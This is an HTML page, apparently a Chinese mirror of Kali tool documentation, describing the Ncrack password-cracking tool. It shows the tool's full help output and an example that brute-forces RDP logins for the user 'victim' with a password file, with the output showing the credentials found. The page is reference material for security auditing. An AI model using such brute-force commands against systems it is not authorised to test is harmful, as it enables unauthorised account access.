<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>kali工具箱</title>
<script src="./static/bootstrap.min.js"></script>
<link rel="stylesheet" href="./static/main.css">
<link rel="stylesheet" href="./static/bootstrap.min.css">
<style type="text/css" id="syntaxhighlighteranchor"></style>
</head>
<main class="main-container ng-scope" ng-view="">
<div class="main receptacle post-view ng-scope">
<article class="entry ng-scope" ng-controller="EntryCtrl" ui-lightbox="">
<section class="entry-content ng-binding" ng-bind-html="postContentTrustedHtml">
<h2> Ncrack包装说明</h2><p style="text-align: justify;"> Ncrack是一个高速的网络认证破解工具。它的建立是为了帮助公司通过积极主动地测试所有的主机和网络为贫困密码设备保护他们的网络。审核客户时，安全专家还要靠Ncrack。 Ncrack采用模块化方法，类似的Nmap命令行语法和动态引擎，可以根据网络的反馈调整自己的行为而设计的。它允许多个主机的快速而可靠的大规模审计。 </p><p> Ncrack的功能包括一个非常灵活的接口授予用户完全控制网络操作的，允许非常复杂的穷举攻击，定时模板的易用性，类似的Nmap的许多更多的运行时的交互。支持的协议包括RDP，SSH，HTTP（S），SMB，POP3（S），VNC，FTP和Telnet。 </p><p>资料来源：http://nmap.org/ncrack/ <br> <a href="http://nmap.org/ncrack/" variation="deepblue" target="blank">Ncrack首页</a> | <a href="http://git.kali.org/gitweb/?p=packages/ncrack.git;a=summary" variation="deepblue" target="blank">卡利Ncrack回购</a> </p><ul><li>作者：Insecure.Com有限责任公司</li><li>许可：GPL第二版</li></ul><h3>包含在ncrack包工具</h3><h5> ncrack - 高速网络认证破解工具</h5><code><a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="fe8c91918abe959f9297">[email&#160;protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>:~# ncrack -h<br>
Ncrack 0.4ALPHA ( http://ncrack.org )<br>
Usage: ncrack [Options] {target and service specification}<br>
TARGET SPECIFICATION:<br>
  Can pass hostnames, IP addresses, networks, etc.<br>
  Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254<br>
  -iX &lt;inputfilename&gt;: Input from Nmap's -oX XML output format<br>
  -iN &lt;inputfilename&gt;: Input from Nmap's -oN Normal output format<br>
  -iL &lt;inputfilename&gt;: Input from list of hosts/networks<br>
  --exclude &lt;host1[,host2][,host3],...&gt;: Exclude hosts/networks<br>
  --excludefile &lt;exclude_file&gt;: Exclude list from file<br>
SERVICE SPECIFICATION:<br>
  Can pass target specific services in &lt;service&gt;://target (standard) notation or<br>
  using -p which will be applied to all hosts in non-standard notation.<br>
  Service arguments can be specified to be host-specific, type of service-specific<br>
  (-m) or global (-g). Ex: ssh://10.0.0.10,at=10,cl=30 -m ssh:at=50 -g cd=3000<br>
  Ex2: ncrack -p ssh,ftp:3500,25 10.0.0.10 scanme.nmap.org google.com:80,ssl<br>
  -p &lt;service-list&gt;: services will be applied to all non-standard notation hosts<br>
  -m &lt;service&gt;:&lt;options&gt;: options will be applied to all services of this type<br>
  -g &lt;options&gt;: options will be applied to every service globally<br>
  Misc options:<br>
    ssl: enable SSL over this service<br>
    path &lt;name&gt;: used in modules like HTTP ('=' needs escaping if used)<br>
TIMING AND PERFORMANCE:<br>
  Options which take &lt;time&gt; are in seconds, unless you append 'ms'<br>
  (miliseconds), 'm' (minutes), or 'h' (hours) to the value (e.g. 30m).<br>
  Service-specific options:<br>
    cl (min connection limit): minimum number of concurrent parallel connections<br>
    CL (max connection limit): maximum number of concurrent parallel connections<br>
    at (authentication tries): authentication attempts per connection<br>
    cd (connection delay): delay &lt;time&gt; between each connection initiation<br>
    cr (connection retries): caps number of service connection attempts<br>
    to (time-out): maximum cracking &lt;time&gt; for service, regardless of success so far<br>
  -T&lt;0-5&gt;: Set timing template (higher is faster)<br>
  --connection-limit &lt;number&gt;: threshold for total concurrent connections<br>
AUTHENTICATION:<br>
  -U &lt;filename&gt;: username file<br>
  -P &lt;filename&gt;: password file<br>
  --user &lt;username_list&gt;: comma-separated username list<br>
  --pass &lt;password_list&gt;: comma-separated password list<br>
  --passwords-first: Iterate password list for each username. Default is opposite.<br>
OUTPUT:<br>
  -oN/-oX &lt;file&gt;: Output scan in normal and XML format, respectively, to the given filename.<br>
  -oA &lt;basename&gt;: Output in the two major formats at once<br>
  -v: Increase verbosity level (use twice or more for greater effect)<br>
  -d[level]: Set or increase debugging level (Up to 10 is meaningful)<br>
  --nsock-trace &lt;level&gt;: Set nsock trace level (Valid range: 0 - 10)<br>
  --log-errors: Log errors/warnings to the normal-format output file<br>
  --append-output: Append to rather than clobber specified output files<br>
MISC:<br>
  --resume &lt;file&gt;: Continue previously saved session<br>
  -f: quit cracking service after one found credential<br>
  -6: Enable IPv6 cracking<br>
  -sL or --list: only list hosts and services<br>
  --datadir &lt;dirname&gt;: Specify custom Ncrack data file location<br>
  -V: Print version number<br>
  -h: Print this help summary page.<br>
MODULES:<br>
  FTP, SSH, TELNET, HTTP(S), POP3(S), SMB, RDP, VNC<br>
EXAMPLES:<br>
  ncrack -v --user root localhost:22<br>
  ncrack -v -T5 https://192.168.0.1<br>
  ncrack -v -iX ~/nmap.xml -g CL=5,to=1h<br>
SEE THE MAN PAGE (http://nmap.org/ncrack/man.html) FOR MORE OPTIONS AND EXAMPLES</code><h3> ncrack用法示例</h3><p>用详细模式<b><i>（-v），</i></b>读取IP <b><i>地址（-iL win.txt）的列表</i></b> ，并尝试登录的用户名受害人<b><i>（-user受害者）</i></b>随着口令字典<b><i>（-P passes.txt）</i></b>使用RDP协议<b><i>（-p RDP）</i></b>与在时刻<b><i>（CL = 1）</i></b>的一个连接： </p><code><a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="f0829f9f84b09b919c99">[email&#160;protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>:~# ncrack -v -iL win.txt --user victim -P passes.txt -p rdp CL=1<br>
<br>
Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2014-05-19 09:54 EDT<br>
<br>
rdp://192.168.1.220:3389 finished.<br>
Discovered credentials on rdp://192.168.1.200:3389 'victim' 's3cr3t'</code><div style="display:none">
<script src="//s11.cnzz.com/z_stat.php?id=1260038378&web_id=1260038378" language="JavaScript"></script>
</div>
</main></body></html>
